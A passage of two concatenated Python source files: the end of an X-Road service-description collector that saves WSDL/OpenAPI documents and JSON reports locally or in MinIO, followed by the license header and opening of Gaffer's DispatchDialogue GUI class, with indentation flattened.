else:
try:
with open('{}/_wsdl_hashes'.format(params['path']), 'r') as json_file:
hashes = json.load(json_file)
except IOError:
hashes = hash_wsdls(path, params)
return hashes
def save_wsdl(path, hashes, wsdl, wsdl_replaces, params):
"""Save WSDL if it does not exist yet"""
# Replacing dynamically generated comments in WSDL to avoid new WSDL
# creation because of comments.
for wsdl_replace in wsdl_replaces:
wsdl = re.sub(wsdl_replace[0], wsdl_replace[1], wsdl)
wsdl_hash = hashlib.md5(wsdl.encode('utf-8')).hexdigest()
max_wsdl = -1
for file_name in hashes.keys():
if wsdl_hash == hashes[file_name]:
# Matching WSDL found
return file_name, hashes
search_res = re.search('^(\\d+)\\.wsdl$', file_name)
if search_res:
if int(search_res.group(1)) > max_wsdl:
max_wsdl = int(search_res.group(1))
# Creating new file
new_file = '{}.wsdl'.format(int(max_wsdl) + 1)
wsdl_binary = wsdl.encode('utf-8')
if params['minio']:
params['minio_client'].put_object(
params['minio_bucket'], '{}{}'.format(path, new_file),
BytesIO(wsdl_binary), len(wsdl_binary), content_type='text/xml')
else:
# Writing as bytes to avoid line ending conversion
with open('{}/{}'.format(path, new_file), 'wb') as wsdl_file:
wsdl_file.write(wsdl_binary)
hashes[new_file] = wsdl_hash
return new_file, hashes
def hash_openapis(path, params):
"""Find hashes of all OpenAPI documents in directory"""
hashes = {}
if params['minio']:
for obj in params['minio_client'].list_objects(
params['minio_bucket'], prefix=path, recursive=False):
file_name = obj.object_name[len(path):]
search_res = re.search('^.+_(\\d+)\\.(yaml|json)$', file_name)
if search_res:
openapi_object = params['minio_client'].get_object(
params['minio_bucket'], '{}{}'.format(path, file_name))
hashes[file_name] = hashlib.md5(openapi_object.data).hexdigest()
else:
for file_name in os.listdir(path):
search_res = re.search('^.+_(\\d+)\\.(yaml|json)$', file_name)
if search_res:
# Reading as bytes to avoid line ending conversion
with open('{}/{}'.format(path, file_name), 'rb') as openapi_file:
openapi = openapi_file.read()
hashes[file_name] = hashlib.md5(openapi).hexdigest()
return hashes
def get_openapi_hashes(path, params):
"""Get OpenAPI hashes in a directory"""
if params['minio']:
try:
openapi_hashes_file = params['minio_client'].get_object(
params['minio_bucket'], '{}_openapi_hashes'.format(path))
hashes = json.loads(openapi_hashes_file.data.decode('utf-8'))
except NoSuchKey:
hashes = hash_openapis(path, params)
else:
try:
with open('{}/_openapi_hashes'.format(params['path']), 'r') as json_file:
hashes = json.load(json_file)
except IOError:
hashes = hash_openapis(path, params)
return hashes
def save_openapi(path, hashes, openapi, service_name, doc_type, params):
"""Save OpenAPI if it does not exist yet"""
openapi_hash = hashlib.md5(openapi.encode('utf-8')).hexdigest()
max_openapi = -1
for file_name in hashes.keys():
search_res = re.search('^{}_(\\d+)\\.(yaml|json)$'.format(service_name), file_name)
if search_res:
if openapi_hash == hashes[file_name]:
# Matching OpenAPI found (both name pattern and hash)
return file_name, hashes
if int(search_res.group(1)) > max_openapi:
max_openapi = int(search_res.group(1))
# Creating new file
new_file = '{}_{}.{}'.format(service_name, int(max_openapi) + 1, doc_type)
openapi_binary = openapi.encode('utf-8')
content_type = 'text/yaml'
if doc_type == 'json':
content_type = 'application/json'
if params['minio']:
params['minio_client'].put_object(
params['minio_bucket'], '{}{}'.format(path, new_file),
BytesIO(openapi_binary), len(openapi_binary), content_type=content_type)
else:
# Writing as bytes to avoid line ending conversion
with open('{}/{}'.format(path, new_file), 'wb') as openapi_file:
openapi_file.write(openapi.encode('utf-8'))
hashes[new_file] = openapi_hash
return new_file, hashes
def save_hashes(path, hashes, file_type, params):
"""Save hashes of WSDL/OpenAPI documents (to speedup MinIO)"""
if params['minio']:
hashes_binary = json.dumps(hashes, indent=2, ensure_ascii=False).encode()
params['minio_client'].put_object(
params['minio_bucket'], '{}_{}_hashes'.format(path, file_type),
BytesIO(hashes_binary), len(hashes_binary), content_type='text/plain')
else:
write_json('{}/_{}_hashes'.format(path, file_type), hashes, params)
def method_item(method, status, wsdl):
"""Function that sets the correct structure for method item"""
return {
'serviceCode': method[4],
'serviceVersion': method[5],
'methodStatus': status,
'wsdl': wsdl
}
def service_item(service, status, openapi, endpoints):
"""Function that sets the correct structure for service item
If status=='OK' and openapi is empty then:
* it is REST X-Road service that does not have a description;
* endpoints array is empty.
If status=='OK' and openapi is not empty then:
* it is OpenAPI X-Road service with description;
* at least one endpoint must be present in OpenAPI description.
In other cases status must not be 'OK' to indicate problem with
the service.
"""
return {
'serviceCode': service[4],
'status': status,
'openapi': openapi,
'endpoints': endpoints
}
def subsystem_item(subsystem, methods, services):
"""Function that sets the correct structure for subsystem item"""
subsystem_status = 'ERROR'
sorted_methods = []
if methods is not None:
subsystem_status = 'OK'
for method_key in sorted(methods.keys()):
sorted_methods.append(methods[method_key])
return {
'xRoadInstance': subsystem[0],
'memberClass': subsystem[1],
'memberCode': subsystem[2],
'subsystemCode': subsystem[3],
'subsystemStatus': subsystem_status,
'servicesStatus': 'OK' if services is not None else 'ERROR',
'methods': sorted_methods,
'services': services if services is not None else []
}
def process_methods(subsystem, params, doc_path):
"""Function that finds SOAP methods of a subsystem"""
wsdl_path = '{}{}/'.format(params['minio_path'], doc_path)
if not params['minio']:
wsdl_path = '{}/{}'.format(params['path'], doc_path)
try:
if not params['minio']:
make_dirs(wsdl_path)
hashes = get_wsdl_hashes(wsdl_path, params)
except OSError as err:
LOGGER.warning('SOAP: %s: %s', identifier_path(subsystem), err)
return None
method_index = {}
skip_methods = False
try:
# Converting iterator to list to properly capture exceptions
methods = list(xrdinfo.methods(
addr=params['url'], client=params['client'], producer=subsystem,
method='listMethods', timeout=params['timeout'], verify=params['verify'],
cert=params['cert']))
except xrdinfo.XrdInfoError as err:
LOGGER.info('SOAP: %s: %s', identifier_path(subsystem), err)
return None
for method in sorted(methods):
method_name = identifier_path(method)
if method_name in method_index:
# Method already found in previous WSDL's
continue
if skip_methods:
# Skipping, because previous getWsdl request timed out
LOGGER.info('SOAP: %s - SKIPPING', method_name)
method_index[method_name] = method_item(method, 'SKIPPED', '')
continue
try:
wsdl = xrdinfo.wsdl(
addr=params['url'], client=params['client'], service=method,
timeout=params['timeout'], verify=params['verify'], cert=params['cert'])
except xrdinfo.RequestTimeoutError:
# Skipping all following requests to that subsystem
skip_methods = True
LOGGER.info('SOAP: %s - TIMEOUT', method_name)
method_index[method_name] = method_item(method, 'TIMEOUT', '')
continue
except xrdinfo.XrdInfoError as err:
if str(err) == 'SoapFault: Service is a REST service and does not have a WSDL':
# This is specific to X-Road 6.21 (partial and
# deprecated support for REST). We do not want to spam
# INFO messages about REST services
LOGGER.debug('SOAP: %s: %s', method_name, err)
else:
LOGGER.info('SOAP: %s: %s', method_name, err)
method_index[method_name] = method_item(method, 'ERROR', '')
continue
try:
wsdl_name, hashes = save_wsdl(wsdl_path, hashes, wsdl, params['wsdl_replaces'], params)
except OSError as err:
LOGGER.warning('SOAP: %s: %s', method_name, err)
method_index[method_name] = method_item(method, 'ERROR', '')
continue
txt = 'SOAP: {}'.format(wsdl_name)
try:
for wsdl_method in xrdinfo.wsdl_methods(wsdl):
wsdl_method_name = identifier_path(subsystem + wsdl_method)
# We can find other methods in a method WSDL
method_index[wsdl_method_name] = method_item(
subsystem + wsdl_method, 'OK', urlparse.quote(
'{}/{}'.format(doc_path, wsdl_name)))
txt = txt + '\n {}'.format(wsdl_method_name)
except xrdinfo.XrdInfoError as err:
txt = txt + '\nWSDL parsing failed: {}'.format(err)
method_index[method_name] = method_item(method, 'ERROR', '')
LOGGER.info(txt)
if method_name not in method_index:
LOGGER.warning(
'SOAP: %s - Method was not found in returned WSDL!', method_name)
method_index[method_name] = method_item(method, 'ERROR', '')
save_hashes(wsdl_path, hashes, 'wsdl', params)
return method_index
def process_services(subsystem, params, doc_path):
"""Function that finds REST services of a subsystem"""
openapi_path = '{}{}/'.format(params['minio_path'], doc_path)
if not params['minio']:
openapi_path = '{}/{}'.format(params['path'], doc_path)
try:
if not params['minio']:
make_dirs(openapi_path)
hashes = get_openapi_hashes(openapi_path, params)
except OSError as err:
LOGGER.warning('REST: %s: %s', identifier_path(subsystem), err)
return None
results = []
skip_services = False
try:
# Converting iterator to list to properly capture exceptions
services = list(xrdinfo.methods_rest(
addr=params['url'], client=params['client'], producer=subsystem,
method='listMethods', timeout=params['timeout'], verify=params['verify'],
cert=params['cert']))
except xrdinfo.XrdInfoError as err:
LOGGER.info('REST: %s: %s', identifier_path(subsystem), err)
return None
for service in sorted(services):
service_name = identifier_path(service)
if skip_services:
# Skipping, because previous getOpenAPI request timed out
LOGGER.info('REST: %s - SKIPPING', service_name)
results.append(service_item(service, 'SKIPPED', '', []))
continue
try:
openapi = xrdinfo.openapi(
addr=params['url'], client=params['client'], service=service,
timeout=params['timeout'], verify=params['verify'], cert=params['cert'])
except xrdinfo.RequestTimeoutError:
# Skipping all following requests to that subsystem
skip_services = True
LOGGER.info('REST: %s - TIMEOUT', service_name)
results.append(service_item(service, 'TIMEOUT', '', []))
continue
except xrdinfo.NotOpenapiServiceError:
results.append(service_item(service, 'OK', '', []))
continue
except xrdinfo.XrdInfoError as err:
LOGGER.info('REST: %s: %s', service_name, err)
results.append(service_item(service, 'ERROR', '', []))
continue
try:
_, openapi_type = xrdinfo.load_openapi(openapi)
endpoints = xrdinfo.openapi_endpoints(openapi)
except xrdinfo.XrdInfoError as err:
LOGGER.info('REST: %s: %s', service_name, err)
results.append(service_item(service, 'ERROR', '', []))
continue
try:
openapi_name, hashes = save_openapi(
openapi_path, hashes, openapi, service[4], openapi_type, params)
except OSError as err:
LOGGER.warning('REST: %s: %s', service_name, err)
results.append(service_item(service, 'ERROR', '', []))
continue
results.append(
service_item(service, 'OK', urlparse.quote(
'{}/{}'.format(doc_path, openapi_name)), endpoints))
save_hashes(openapi_path, hashes, 'openapi', params)
return results
def worker(params):
"""Main function for worker threads"""
while True:
# Checking periodically if it is the time to gracefully shutdown
# the worker.
try:
subsystem = params['work_queue'].get(True, 0.1)
LOGGER.info('Start processing %s', identifier_path(subsystem))
except queue.Empty:
if params['shutdown'].is_set():
return
continue
subsystem_path = ''
try:
subsystem_path = identifier_path(subsystem)
methods_result = process_methods(subsystem, params, subsystem_path)
services_result = process_services(subsystem, params, subsystem_path)
with params['results_lock']:
params['results'][subsystem_path] = subsystem_item(
subsystem, methods_result, services_result)
# Using broad exception to avoid unexpected exits of workers
except Exception as err:
with params['results_lock']:
params['results'][subsystem_path] = subsystem_item(subsystem, None, None)
LOGGER.warning('Unexpected exception: %s: %s', type(err).__name__, err)
finally:
params['work_queue'].task_done()
def hour_start(src_time):
"""Return the beginning of the hour of the specified datetime"""
return datetime(src_time.year, src_time.month, src_time.day, src_time.hour)
def day_start(src_time):
"""Return the beginning of the day of the specified datetime"""
return datetime(src_time.year, src_time.month, src_time.day)
def month_start(src_time):
"""Return the beginning of the month of the specified datetime"""
return datetime(src_time.year, src_time.month, 1)
def year_start(src_time):
"""Return the beginning of the year of the specified datetime"""
return datetime(src_time.year, 1, 1)
def add_months(src_time, amount):
"""Adds specified amount of months to datetime value.
Specifying negative amount will result in subtraction of months.
"""
return src_time.replace(
# To find the year correction we convert the month from 1..12 to
# 0..11 value, add amount of months and find the integer
# part of division by 12.
year=src_time.year + (src_time.month - 1 + amount) // 12,
# To find the new month we convert the month from 1..12 to
# 0..11 value, add amount of months, find the remainder
# part after division by 12 and convert the month back
# to the 1..12 form.
month=(src_time.month - 1 + amount) % 12 + 1)
def shift_current_hour(offset):
"""Shifts current hour by a specified offset"""
start = hour_start(datetime.today())
return start + timedelta(hours=offset)
def shift_current_day(offset):
"""Shifts current hour by a specified offset"""
start = day_start(datetime.today())
return start + timedelta(days=offset)
def shift_current_month(offset):
"""Shifts current hour by a specified offset"""
start = month_start(datetime.today())
return add_months(start, offset)
def add_filtered(filtered, item_key, report_time, history_item, min_time):
"""Add report to the list of filtered reports"""
if min_time is None or item_key >= min_time:
if item_key not in filtered or report_time < filtered[item_key]['time']:
filtered[item_key] = {'time': report_time, 'item': history_item}
def sort_by_report_time(item):
"""A helper function for sorting, indicates which field to use"""
return item['reportTime']
def all_results_failed(subsystems):
"""Check if all results have failed status"""
for subsystem in subsystems.values():
if subsystem['subsystemStatus'] == 'OK':
# Found non-failed subsystem
return False
# All results failed
return True
def write_json(file_name, json_data, params):
"""Write data to JSON file"""
if params['minio']:
json_binary = json.dumps(json_data, indent=2, ensure_ascii=False).encode()
params['minio_client'].put_object(
params['minio_bucket'], file_name,
BytesIO(json_binary), len(json_binary), content_type='application/json')
else:
with open(file_name, 'w') as json_file:
json.dump(json_data, json_file, indent=2, ensure_ascii=False)
def filtered_history(json_history, params):
"""Get filtered reports history"""
min_hour = shift_current_hour(-params['filtered_hours'])
min_day = shift_current_day(-params['filtered_days'])
min_month = shift_current_month(-params['filtered_months'])
filtered_items = {}
for history_item in json_history:
report_time = datetime.strptime(history_item['reportTime'], '%Y-%m-%d %H:%M:%S')
item_key = hour_start(report_time)
add_filtered(filtered_items, item_key, report_time, history_item, min_hour)
item_key = day_start(report_time)
add_filtered(filtered_items, item_key, report_time, history_item, min_day)
item_key = month_start(report_time)
add_filtered(filtered_items, item_key, report_time, history_item, min_month)
# Adding all available years
item_key = year_start(report_time)
add_filtered(filtered_items, item_key, report_time, history_item, None)
# Latest report is always added to filtered history
latest = json_history[0]
unique_items = {latest['reportTime']: latest}
for val in filtered_items.values():
item = val['item']
unique_items[item['reportTime']] = item
json_filtered_history = list(unique_items.values())
json_filtered_history.sort(key=sort_by_report_time, reverse=True)
return json_filtered_history
def add_report_file(file_name, reports, history=False):
"""Add report to reports list if filename matches"""
search_res = re.search(
'^index_(\\d{4})(\\d{2})(\\d{2})(\\d{2})(\\d{2})(\\d{2})\\.json$', file_name)
if search_res and history:
reports.append({
'reportTime': '{}-{}-{} {}:{}:{}'.format(
search_res.group(1), search_res.group(2),
search_res.group(3), search_res.group(4),
search_res.group(5), search_res.group(6)),
'reportPath': file_name})
elif search_res:
reports.append({
'reportTime': datetime(
int(search_res.group(1)), int(search_res.group(2)),
int(search_res.group(3)), int(search_res.group(4)),
int(search_res.group(5)), int(search_res.group(6))),
'reportPath': file_name})
def get_catalogue_reports(params, history=False):
"""Get list of reports"""
reports = []
if params['minio']:
for obj in params['minio_client'].list_objects(
params['minio_bucket'], prefix=params['minio_path'], recursive=False):
file_name = obj.object_name[len(params['minio_path']):]
add_report_file(file_name, reports, history=history)
else:
for file_name in os.listdir(params['path']):
add_report_file(file_name, reports, history=history)
reports.sort(key=sort_by_report_time, reverse=True)
return reports
def get_reports_to_keep(reports, fresh_time):
"""Get reports that must not be removed during cleanup"""
# Latest report is never deleted
unique_paths = {reports[0]['reportTime']: reports[0]['reportPath']}
filtered_items = {}
for report in reports:
if report['reportTime'] >= fresh_time:
# Keeping all fresh reports
unique_paths[report['reportTime']] = report['reportPath']
else:
# Searching for the first report in a day
item_key = datetime(
report['reportTime'].year, report['reportTime'].month, report['reportTime'].day)
if item_key not in filtered_items \
or report['reportTime'] < filtered_items[item_key]['reportTime']:
filtered_items[item_key] = {
'reportTime': report['reportTime'], 'reportPath': report['reportPath']}
# Adding first report of the day
for item in filtered_items.values():
unique_paths[item['reportTime']] = item['reportPath']
paths_to_keep = list(unique_paths.values())
paths_to_keep.sort()
return paths_to_keep
def get_old_reports(params):
"""Get old reports that need to be removed"""
old_reports = []
all_reports = get_catalogue_reports(params)
cur_time = datetime.today()
fresh_time = datetime(cur_time.year, cur_time.month, cur_time.day) - timedelta(
days=params['days_to_keep'])
paths_to_keep = get_reports_to_keep(all_reports, fresh_time)
for report in all_reports:
if not report['reportPath'] in paths_to_keep:
old_reports.append(report['reportPath'])
old_reports.sort()
return old_reports
def get_reports_set(params):
"""Get set of reports"""
reports = set()
if params['minio']:
for obj in params['minio_client'].list_objects(
params['minio_bucket'], prefix=params['minio_path'], recursive=False):
file_name = obj.object_name[len(params['minio_path']):]
search_res = re.search(
'^index_(\\d{4})(\\d{2})(\\d{2})(\\d{2})(\\d{2})(\\d{2})\\.json$',
file_name)
if search_res:
reports.add(file_name)
else:
for file_name in os.listdir(params['path']):
search_res = re.search(
'^index_(\\d{4})(\\d{2})(\\d{2})(\\d{2})(\\d{2})(\\d{2})\\.json$',
file_name)
if search_res:
reports.add(file_name)
return reports
def get_docs_in_report(params, report_file):
if params['minio']:
obj = params['minio_client'].get_object(
params['minio_bucket'], '{}{}'.format(params['minio_path'], report_file))
report_data = json.loads(obj.data.decode('utf-8'))
else:
with open('{}/{}'.format(params['path'], report_file), 'r') as json_file:
report_data = json.load(json_file)
used_docs = set()
for system in report_data:
for method in system['methods']:
if method['wsdl']:
if params['minio']:
used_docs.add('{}{}'.format(params['minio_path'], method['wsdl']))
else:
used_docs.add('{}/{}'.format(params['path'], method['wsdl']))
if 'services' in system:
for service in system['services']:
if service['openapi']:
if params['minio']:
used_docs.add('{}{}'.format(params['minio_path'], service['openapi']))
else:
used_docs.add('{}/{}'.format(params['path'], service['openapi']))
return used_docs
def add_doc_file(file_name, path, docs):
search_res = re.search('^\\d+\\.wsdl$', file_name)
if search_res:
docs.add(os.path.join(path, file_name))
search_res = re.search('^.+_(\\d+)\\.(yaml|json)$', file_name)
if search_res:
docs.add(os.path.join(path, file_name))
def get_available_docs(params):
available_docs = set()
if params['minio']:
for obj in params['minio_client'].list_objects(
params['minio_bucket'],
prefix=os.path.join(params['minio_path'], params['instance']),
recursive=True):
add_doc_file(
os.path.basename(obj.object_name), os.path.dirname(obj.object_name), available_docs)
else:
for root, _, files in os.walk(os.path.join(params['path'], params['instance'])):
for file_name in files:
add_doc_file(file_name, root, available_docs)
return available_docs
def get_unused_docs(params):
reports = get_reports_set(params)
if not reports:
LOGGER.warning('Did not find any reports!')
return set()
used_docs = set()
for report_file in reports:
used_docs = used_docs.union(get_docs_in_report(params, report_file))
if not used_docs:
LOGGER.info('Did not find any documents in reports. This is might be an error.')
return set()
available_docs = get_available_docs(params)
return available_docs - used_docs
def start_cleanup(params):
"""Start cleanup of old reports and documents"""
last_cleanup = None
if params['minio']:
try:
json_file = params['minio_client'].get_object(
params['minio_bucket'], '{}cleanup_status.json'.format(params['minio_path']))
cleanup_status = json.loads(json_file.data.decode('utf-8'))
last_cleanup = datetime.strptime(cleanup_status['lastCleanup'], '%Y-%m-%d %H:%M:%S')
except (NoSuchKey, ValueError):
LOGGER.info('Cleanup status not found')
else:
try:
with open('{}/cleanup_status.json'.format(params['path']), 'r') as json_file:
cleanup_status = json.load(json_file)
last_cleanup = datetime.strptime(cleanup_status['lastCleanup'], '%Y-%m-%d %H:%M:%S')
except (IOError, ValueError):
LOGGER.info('Cleanup status not found')
if last_cleanup:
if datetime.today() - timedelta(days=params['cleanup_interval']) < day_start(last_cleanup):
LOGGER.info('Cleanup interval is not passed yet')
return
LOGGER.info('Starting cleanup')
# Cleanup reports
old_reports = get_old_reports(params)
if len(old_reports):
LOGGER.info('Removing %s old JSON reports:', len(old_reports))
for report_path in old_reports:
if params['minio']:
LOGGER.info('Removing %s%s', params['minio_path'], report_path)
params['minio_client'].remove_object(
params['minio_bucket'], '{}{}'.format(params['minio_path'], report_path))
else:
LOGGER.info('Removing %s/%s', params['path'], report_path)
os.remove('{}/{}'.format(params['path'], report_path))
# Recreating history.json
reports = get_catalogue_reports(params, history=True)
if len(reports):
LOGGER.info('Writing %s reports to history.json', len(reports))
if params['minio']:
write_json('{}history.json'.format(params['minio_path']), reports, params)
else:
write_json('{}/history.json'.format(params['path']), reports, params)
else:
LOGGER.info('No old JSON reports found in directory: %s', params['path'])
# Cleanup documents
unused_docs = get_unused_docs(params)
changed_dirs = set()
if unused_docs:
LOGGER.info('Removing {} unused document(s):'.format(len(unused_docs)))
for doc_path in unused_docs:
LOGGER.info('Removing %s', doc_path)
if params['minio']:
params['minio_client'].remove_object(params['minio_bucket'], doc_path)
else:
os.remove(doc_path)
changed_dirs.add(os.path.dirname(doc_path))
else:
LOGGER.info('No unused documents found')
# Recreating document hashes cache
for doc_path in changed_dirs:
LOGGER.info('Recreating WSDL hashes cache for %s', doc_path)
hashes = get_wsdl_hashes(doc_path, params)
save_hashes(doc_path, hashes, 'wsdl', params)
LOGGER.info('Recreating OpenAPI hashes cache for %s', doc_path)
hashes = get_openapi_hashes(doc_path, params)
save_hashes(doc_path, hashes, 'openapi', params)
# Updating status
cleanup_time = time.strftime('%Y-%m-%d %H:%M:%S', time.localtime(time.time()))
json_status = {'lastCleanup': cleanup_time}
if params['minio']:
write_json('{}cleanup_status.json'.format(params['minio_path']), json_status, params)
else:
write_json('{}/cleanup_status.json'.format(params['path']), json_status, params)
def process_results(params):
"""Process results collected by worker threads"""
results = params['results']
if all_results_failed(results):
# Skipping this version
LOGGER.error('All subsystems failed, skipping this catalogue version!')
sys.exit(1)
json_data = []
for subsystem_key in sorted(results.keys()):
json_data.append(results[subsystem_key])
report_time = time.localtime(time.time())
formatted_time = time.strftime('%Y-%m-%d %H:%M:%S', report_time)
suffix = time.strftime('%Y%m%d%H%M%S', report_time)
if params['minio']:
write_json('{}index_{}.json'.format(params['minio_path'], suffix), json_data, params)
else:
write_json('{}/index_{}.json'.format(params['path'], suffix), json_data, params)
json_history = []
if params['minio']:
try:
json_history_file = params['minio_client'].get_object(
params['minio_bucket'], '{}history.json'.format(params['minio_path']))
json_history = json.loads(json_history_file.data.decode('utf-8'))
except NoSuchKey:
LOGGER.info('History file history.json not found')
else:
try:
with open('{}/history.json'.format(params['path']), 'r') as json_file:
json_history = json.load(json_file)
except IOError:
LOGGER.info('History file history.json not found')
json_history.append({'reportTime': formatted_time, 'reportPath': 'index_{}.json'.format(
suffix)})
json_history.sort(key=sort_by_report_time, reverse=True)
if params['minio']:
write_json('{}history.json'.format(params['minio_path']), json_history, params)
write_json('{}filtered_history.json'.format(params['minio_path']), filtered_history(
json_history, params), params)
else:
write_json('{}/history.json'.format(params['path']), json_history, params)
write_json('{}/filtered_history.json'.format(params['path']), filtered_history(
json_history, params), params)
# Replace index.json with latest report
if params['minio']:
params['minio_client'].copy_object(
params['minio_bucket'], '{}index.json'.format(params['minio_path']),
'/{}/{}index_{}.json'.format(params['minio_bucket'], params['minio_path'], suffix))
else:
shutil.copy('{}/index_{}.json'.format(
params['path'], suffix), '{}/index.json'.format(params['path']))
# Updating status
json_status = {'lastReport': formatted_time}
if params['minio']:
write_json('{}status.json'.format(params['minio_path']), json_status, params)
else:
write_json('{}/status.json'.format(params['path']), json_status, params)
start_cleanup(params)
def main():
"""Main function"""
logging.config.dictConfig(DEFAULT_LOGGER)
parser = argparse.ArgumentParser(
description='Collect WSDL service descriptions from X-Road members.',
formatter_class=argparse.RawDescriptionHelpFormatter,
epilog='By default peer TLS certificate is not validated.'
)
parser.add_argument(
'config', metavar='CONFIG_FILE',
help='Configuration file')
args = parser.parse_args()
config = load_config(args.config)
if config is None:
sys.exit(1)
configure_logging(config)
params = set_params(config)
if params is None:
sys.exit(1)
if not params['minio']:
if not make_dirs(params['path']):
sys.exit(1)
if params['minio']:
prepare_minio_client(params)
try:
shared_params = xrdinfo.shared_params_ss(
addr=params['url'], instance=params['instance'], timeout=params['timeout'],
verify=params['verify'], cert=params['cert'])
except xrdinfo.XrdInfoError as err:
LOGGER.error('Cannot download Global Configuration: %s', err)
sys.exit(1)
# Create and start new threads
threads = []
for _ in range(params['thread_cnt']):
thread = Thread(target=worker, args=(params,))
thread.daemon = True
thread.start()
threads.append(thread)
# Populate the queue
try:
for subsystem in xrdinfo.registered_subsystems(shared_params):
if subsystem[2] in params['excluded_member_codes']:
LOGGER.info('Skipping excluded member %s', identifier_path(subsystem))
continue
if [subsystem[2], subsystem[3]] in params['excluded_subsystem_codes']:
LOGGER.info('Skipping excluded subsystem %s', identifier_path(subsystem))
continue
params['work_queue'].put(subsystem)
except xrdinfo.XrdInfoError as err:
LOGGER.error('Cannot process Global Configuration: %s', err)
sys.exit(1)
# Block until all tasks in queue are done
params['work_queue'].join()
# Set shutdown event and wait until all daemon processes finish
params['shutdown'].set()
for thread in threads:
thread.join()
process_results(params)
if __name__ == '__main__':
main()
|
DispatchDialogue.py
|
##########################################################################
#
# Copyright (c) 2018, Image Engine Design Inc. All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above
# copyright notice, this list of conditions and the following
# disclaimer.
#
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following
# disclaimer in the documentation and/or other materials provided with
# the distribution.
#
# * Neither the name of John Haddon nor the names of
# any other contributors to this software may be used to endorse or
# promote products derived from this software without specific prior
# written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS
# IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,
# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR
# CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL,
# EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
# PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR
# PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF
# LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING
# NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#
##########################################################################
import functools
import sys
import threading
import traceback
import IECore
import Gaffer
import GafferDispatch
import GafferUI
## A dialogue which can be used to dispatch tasks
class DispatchDialogue( GafferUI.Dialogue ) :
## Defines what happens when the tasks have been successfully dispatched :
#
# Close : The dialogue is closed immediately.
#
# Confirm : The dialogue remains open confirming success, with a button for returning to the editing state.
PostDispatchBehaviour = IECore.Enum.create( "Close", "Confirm" )
__dispatchDialogueMenuDefinition = None
def __init__( self, tasks, dispatchers, nodesToShow, postDispatchBehaviour=PostDispatchBehaviour.Confirm, title="Dispatch Tasks", sizeMode=GafferUI.Window.SizeMode.Manual, **kw ) :
GafferUI.Dialogue.__init__( self, title, sizeMode=sizeMode, **kw )
self._getWidget().setBorderStyle( GafferUI.Frame.BorderStyle.None )
self.__dispatchers = dispatchers
self.__tasks = tasks
self.__nodesToShow = nodesToShow
self.__script = tasks[0].scriptNode()
# hold a reference to the script window so plugs which launch child windows work properly.
# this is necessary for PlugValueWidgets like color swatches and ramps. Ideally those widgets
# wouldn't rely on the existence of a ScriptWindow and we could drop this acquisition.
self.__scriptWindow = GafferUI.ScriptWindow.acquire( self.__script )
self.__postDispatchBehaviour = postDispatchBehaviour
# build tabs for all the node, dispatcher, and context settings
with GafferUI.ListContainer() as self.__settings :
mainMenu = GafferUI.MenuBar( self.menuDefinition() )
mainMenu.setVisible( False )
with GafferUI.TabbedContainer() as self.__tabs :
for node in self.__nodesToShow :
nodeFrame = GafferUI.Frame( borderStyle=GafferUI.Frame.BorderStyle.None, borderWidth=0 )
nodeFrame.addChild( self.__nodeEditor( node ) )
# remove the per-node execute button
Gaffer.Metadata.registerValue( node, "layout:customWidget:dispatchButton:widgetType", "", persistent = False )
self.__tabs.setLabel( nodeFrame, node.relativeName( self.__script ) )
with GafferUI.ListContainer() as dispatcherTab :
with GafferUI.ListContainer( GafferUI.ListContainer.Orientation.Horizontal, spacing=2, borderWidth=4 ) as dispatcherMenuColumn :
GafferUI.Label( "<h4>Dispatcher</h4>" )
self.__dispatchersMenu = GafferUI.MultiSelectionMenu( allowMultipleSelection = False, allowEmptySelection = False )
self.__dispatchersMenu.append( [ x.getName() for x in self.__dispatchers ] )
self.__dispatchersMenu.setSelection( [ self.__dispatchers[0].getName() ] )
self.__dispatchersMenuChanged = self.__dispatchersMenu.selectionChangedSignal().connect( Gaffer.WeakMethod( self.__dispatcherChanged ) )
dispatcherMenuColumn.setVisible( len(self.__dispatchers) > 1 )
self.__dispatcherFrame = GafferUI.Frame( borderStyle=GafferUI.Frame.BorderStyle.None, borderWidth=0 )
self.__tabs.setLabel( dispatcherTab, "Dispatcher" )
with GafferUI.Frame( borderStyle=GafferUI.Frame.BorderStyle.None, borderWidth=4 ) as contextTab :
GafferUI.PlugValueWidget.create( self.__script["variables"] )
self.__tabs.setLabel( contextTab, "Context Variables" )
# build a ui element for progress feedback and messages
with GafferUI.ListContainer( spacing = 4 ) as self.__progressUI :
with GafferUI.ListContainer( parenting = { "horizontalAlignment" : GafferUI.HorizontalAlignment.Center, "verticalAlignment" : GafferUI.VerticalAlignment.Center } ) :
self.__progressIconFrame = GafferUI.Frame( borderStyle = GafferUI.Frame.BorderStyle.None, parenting = { "horizontalAlignment" : GafferUI.HorizontalAlignment.Center } )
self.__progressLabel = GafferUI.Label( parenting = { "horizontalAlignment" : GafferUI.HorizontalAlignment.Center } )
with GafferUI.Collapsible( "Details", collapsed = True, parenting = { "expand" : True } ) as self.__messageCollapsible :
self.__messageWidget = GafferUI.MessageWidget()
# connect to the collapsible state change so we can increase the window
# size when the details pane is first shown.
self.__messageCollapsibleConneciton = self.__messageCollapsible.stateChangedSignal().connect( Gaffer.WeakMethod( self.__messageCollapsibleChanged ) )
self.__backButton = self._addButton( "Back" )
self.__backButtonConnection = self.__backButton.clickedSignal().connect( 0, Gaffer.WeakMethod( self.__initiateSettings ) )
self.__primaryButton = self._addButton( "Dispatch" )
self.__setDispatcher( dispatchers[0] )
self.__initiateSettings( self.__primaryButton )
@staticmethod
